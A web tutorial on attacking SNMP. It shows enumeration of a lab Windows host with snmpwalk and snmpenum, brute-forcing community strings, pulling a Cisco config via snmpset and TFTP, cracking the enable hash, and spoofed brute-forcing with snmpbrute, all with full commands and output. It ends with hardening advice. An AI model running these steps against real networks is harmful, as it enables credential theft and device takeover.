Quantcast

SNMP Enumeration and Hacking

Get the WebProNews Newsletter:
[ Business]

Description
SNMP (Simple Network Management Protocol) is a protocol that never seems to get the attention it deserves. As a “security expert” I am quite ashamed to say, that I was not fully aware of all the intricate possibilities that lie within SNMP, until quite recently.

Once you get your hands dirty, SNMP can get quite interesting. Personally it really reminds me of “The Matrix”with the ability to monitor almost anything, and alert about anomalies
For those of you not up tp par with SNMP, I strongly recommend a quick read through:

http://www.chapo.co.il/articles/snmp/
http://net-snmp.sourceforge.net/
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm

This tutorial will assume you know your stuff, but just a few basic terms (taken from chapo.co.il):

SNMP – (Simple Network Management Protocol) – an application-layer protocol for managing TCP/IP based networks. SNMP runs over UDP (which runs over IP).

MIB – (Management Information Base) – provides a standard representation of the SNMP agent’s available information and where it is stored.

NMS – (Network Management Station) – A device designed to poll SNMP agents for information.

SNMP Agent – a device running some software that understands the language of SNMP. Almost any network device could potentially run SNMP, but typically you will find SNMP agents running on internetworking devices (eg. routers, hubs, switches, bridges). Some operating systems (UNIX, Windows NT) can also run SNMP agents.

The main problem with SNMP is that the authentication method (public and private community strings) is inherently weak, not to mention the fact the SNMP is based on UDP, which is prone to spoofing. So, we’ve got a weak protocol, often forgotten and misconfigured – a disaster just waiting to happen.
Just to get a taste of what kind on info SNMP can get, we’ll use snmpwalk – a linux based tool. (I’ve found Win32 ports for these tools, but I strongly suggest using Linux for this tutorial).

In the first example we will use “public” (the default) community string to enumerate a Windows Machine running SNMP.

 #snmpwalk -c public 192.168.0.222
(General Info)
.iso.3.6.1.2.1.1.1.0 = "Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0"
iso.3.6.1.2.1.6.13.1.2.192.168.0.222.139.0.0.0.0.59542 = IpAddress: 192.168.0.222
(Open Ports)
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.59620 = 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.25.0.0.0.0.18484 = 25
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.59465 = 80
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.119.0.0.0.0.51385 = 119
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.26722 = 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.2272 = 443
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.43190 = 445
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.563.0.0.0.0.34828 = 563
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1025.0.0.0.0.10361 = 1025
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1026.0.0.0.0.18486 = 1026
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1029.0.0.0.0.18510 = 1029
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1755.0.0.0.0.10411 = 1755
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3372.0.0.0.0.2224 = 3372
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.59426 = 3389
..iso.3.6.1.2.1.6.13.1.3.192.168.0.222.139.0.0.0.0.59542 = 139
(Drives)
iso.3.6.1.2.1.25.2.3.1.3.1 = "A:"
.iso.3.6.1.2.1.25.2.3.1.3.2 = "C: Label:  Serial Number 28a1a476"
.iso.3.6.1.2.1.25.2.3.1.3.3 = "D: Label:W2KSEL_EN  Serial Number 9ac432a9"
iso.3.6.1.2.1.25.2.3.1.3.4 = "Virtual Memory"
(Processes)
iso.3.6.1.2.1.25.4.2.1.2.1 = "System Idle Process
iso.3.6.1.2.1.25.4.2.1.2.8 = "System"
iso.3.6.1.2.1.25.4.2.1.2.176 = "smss.exe"
iso.3.6.1.2.1.25.4.2.1.2.200 = "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.224 = "winlogon.exe"
iso.3.6.1.2.1.25.4.2.1.2.252 = "services.exe"
iso.3.6.1.2.1.25.4.2.1.2.264 = "lsass.exe"
iso.3.6.1.2.1.25.4.2.1.2.380 = "termsrv.exe"
iso.3.6.1.2.1.25.4.2.1.2.500 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.532 = "SPOOLSV.EXE"
iso.3.6.1.2.1.25.4.2.1.2.564 = "msdtc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.668 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.692 = "llssrv.exe"
iso.3.6.1.2.1.25.4.2.1.2.768 = "NSPMON.exe"
.iso.3.6.1.2.1.25.4.2.1.2.796 = "NSCM.exe"
iso.3.6.1.2.1.25.4.2.1.2.868 = "regsvc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.908 = "mstask.exe"
iso.3.6.1.2.1.25.4.2.1.2.960 = "VMwareService.e"
iso.3.6.1.2.1.25.4.2.1.2.992 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.1020 = "dfssvc.exe"
iso.3.6.1.2.1.25.4.2.1.2.1040 = "inetinfo.exe"
iso.3.6.1.2.1.25.4.2.1.2.1056 = "nspm.exe"
iso.3.6.1.2.1.25.4.2.1.2.1108 = "NSUM.exe"
iso.3.6.1.2.1.25.4.2.1.2.1364 = "explorer.exe"
iso.3.6.1.2.1.25.4.2.1.2.1544 = "VMwareTray.exe"
iso.3.6.1.2.1.25.4.2.1.2.1572 = "VMwareUser.exe"
iso.3.6.1.2.1.25.4.2.1.2.1600 = "cmd.exe"
iso.3.6.1.2.1.25.4.2.1.2.1616 = "mdm.exe"
iso.3.6.1.2.1.25.4.2.1.2.1660 = "mshta.exe"
iso.3.6.1.2.1.25.4.2.1.2.1712 = "snmp.exe"
iso.3.6.1.2.1.25.4.2.1.2.1724 = "snmptrap.exe"
 (Installed Apps)
iso.3.6.1.2.1.25.6.3.1.2.1 = "Sentinel 2.0"
iso.3.6.1.2.1.25.6.3.1.2.2 = "VMware Tools"
iso.3.6.1.2.1.25.6.3.1.2.3 = "WebFldrs"
#

We see that a simple walk on the standard MIB tree wield a whopping amount of information. By using specific vendor private mibs, more information can be found – as can be seen by using Filip Waeytens’ tool – SNMPEnum. Notice that “windows.txt” contains private MIB values for Microsoft Products.


# perl snmpenum.pl
Usage: perl enum.pl <IP-address> <community> <configfile>
# perl snmpenum.pl 192.168.0.222 windows.txt	

SERVICES
Server Alerter Event Log Messenger DNS Client DHCP Client Workstation SNMP Service Plug and Play .. World Wide Web Publishing Service Distributed Transaction Coordinator Simple Mail Transport Protocol (SMTP) Network News Transport Protocol (NNTP) Windows Management Instrumentation Driver Extensions
DISKS
A: C: Label: Serial Number 28a1a476 D: Label:W2KSEL_EN Serial Number 9ac432a9 Virtual Memory
LISTENING TCP PORTS
21 25 80 119 135 443 445 563 1025 1026 1029 1755 3372 3389
UPTIME
16 minutes, 52.92
LISTENING UDP PORTS
135 161 162 445 1028 1030 1755 3456
USERS
Guest IUSR_LAB-SP3 IWAM_LAB-SP3 Administrator TsInternetUser NetShowServices
DOMAIN
WORKGROUP
SYSTEM INFO
Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
HOSTNAME
LAB-SP3
RUNNING PROCESSES
System Idle Process System smss.exe csrss.exe winlogon.exe services.exe lsass.exe termsrv.exe svchost.exe cmd.exe mdm.exe mshta.exe snmp.exe snmptrap.exe
INSTALLED SOFTWARE
Sentinel 2.0 VMware Tools WebFldrs
SHARES
MyShare C:Documents and SettingsAdministratorDesktopMyShare

Surprised? YesSNMP is a powerful enumeration tool. However, a common misconception is that SNMP is “read only”, and that no actual changes can be made using SNMP. This couldn’t be further from the truth as we will see in this next example.

The Community strings for SNMP can be brute forced, using a variety of tools (I heard rumors of a perl tool coming out soon J). I will be using the SNMP Bruteforce tool from the Solarwinds tool pack, to bruteforce the community strings of a router:


Once the read / write community string is found, we can use snmpset to download the router config file. Notice the syntax:

snmpset -c <RW community> <router hostname/IP>.1.3.6.1.4.1.9.2.1.55.<TFTP IP octet1>.<octet 2>.<octet 3>.<octet 4> string <path/file on TFTP server to save file to>


# snmpset -c password 192.168.1.254 .1.3.6.1.4.1.9.2.1.55.192.168.1.232 s conf
SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.232 = STRING: "conf"
# cat conf
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1
.
interface FastEthernet0/24
!
ip default-gateway 192.168.1.138
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
 login
!
end
#

We have downloaded the config file, with all the configuration parameters of the router (well, it’s a switch, but same-same). We see the snmp and vty passwords in clear text, however, the enable password is encrypted. We can use john the ripper to brute this hash. We’ll be taking the encrypted password, and formatting it in a text file, similar to the format of unix shadow files.


Once this is done we run john on this file, and wait for the password to be found:

We have now found the enable password to the router. We can log on using “muts” and “mutz” as the password and enable password respectively.

A nice bruteforcer, spoofer and automatic config downloader called snmpbrute (found in packetstorm) will actually bruteforce and copy the router config file to a TFTP server, assuming the correct community name is found.


#snmpbrute -s 192.168.1.254 -d 192.168.1.254 -w word.txt -m 2 -t 192.168.1.232
Ok, spoofing packets from 192.168.1.254 to 192.168.1.254 with wordlist word.txt 
(Delay: 200)
TFTP Address:192.168.1.232
Size is 39
Read 6 words/lines
Address of tftp server is 192.168.1.232
# cat running-config
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1

interface FastEthernet0/24
!
interface VLAN1
ip address 192.168.1.254 255.255.255.0
no ip directed-broadcast
no ip route-cache
!
ip default-gateway 192.168.1.138
snmp-server engineID local 0000000902000003E3645800
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
login
!
end
#

IMHO, Solarwinds has got the most complete set of SNMP security / testing tools. Just a few more screenshots of Solarwinds, to get the curiosity running.. ..

Summary and Conclusion
Since SNMP is not usually audited, and may pose a significant threat if left misconfigured, it is considered a “high risk” protocol. If you have to use it, make sure to use strong community passwords, and configure SNMP access lists accordingly. If you have an option, consider using SNMP v.3.

Most importantly..Get to know your SNMP!

Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP

Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.

SNMP Enumeration and Hacking
Top Rated White Papers and Resources
  • dataman

    ooh my god you are so fast
    i like u my brother and ii with to leerin mor and mor about the linux